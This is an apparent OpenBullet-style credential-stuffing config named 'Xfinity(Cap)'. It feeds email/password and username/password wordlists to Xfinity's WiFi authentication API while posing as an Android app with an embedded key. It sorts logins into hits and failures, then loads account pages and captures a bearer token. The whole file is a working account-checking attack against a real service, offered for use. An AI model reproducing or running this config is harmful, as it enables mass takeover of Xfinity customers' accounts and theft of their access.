[SETTINGS]
{
  "Name": "Xfinity(Cap)",
  "SuggestedBots": 10,
  "LastModified": "2018-05-20T02:20:26.0871952+02:00",
  "AdditionalInfo": "",
  "Author": "Chaos",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "prov.wifi.xfinity.com/api/api.php" AutoRedirect=TRUE 
  CONTENT "{\"auth_request\":{\"appId\":\"00013\",\"appVer\":\"5.0.5 (551)\",\"callType\":\"R\",\"device\":{\"browser\":\"\",\"browserVersion\":\"\",\"cm\":\"02:00:00:00:00:00\",\"os\":\"Android\",\"osVersion\":\"8.0.0\",\"resourceType\":\"samsung SM-N950F\"},\"get_mobileconfig\":\"false\",\"key\":\"HhVp8NKFM9wYYAZfXChkDcWWmphqAfttYmfewgvS86rZpNX9\",\"password\":\"<PASS>\",\"username\":\"<USER>\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 8.0.0; SM-N950F Build/R16NW)" 
  HEADER "Pragma: no-cache" 
  HEADER "appId: appId" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "auth_failure" 
  KEYCHAIN Success OR 
    KEY "auth_success" 
REQUEST GET "https://my.xfinity.com/?CMP=ILC_myxfinity_myAccountWeb_au" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "https://login.comcast.net/oauth/sp-logout?client_id=my-xfinity" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "https://login.comcast.net/oauth/sp-logout?client_id=my-xfinity" 
REQUEST GET "https://customer.xfinity.com/#/settings/account" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "<title>XFINITY | My Account | EcoBill® Online Bill Pay</title><meta" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "<title>XFINITY | My Account | EcoBill® Online Bill Pay</title><meta" 
REQUEST POST "https://api.sc.xfinity.com/user" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Bearer <TOKEN>" 
PARSE "<HEADERS(<TOKEN>)>" LR "" "" Recursive=FALSE -> VAR "TOKEN" "" "" 
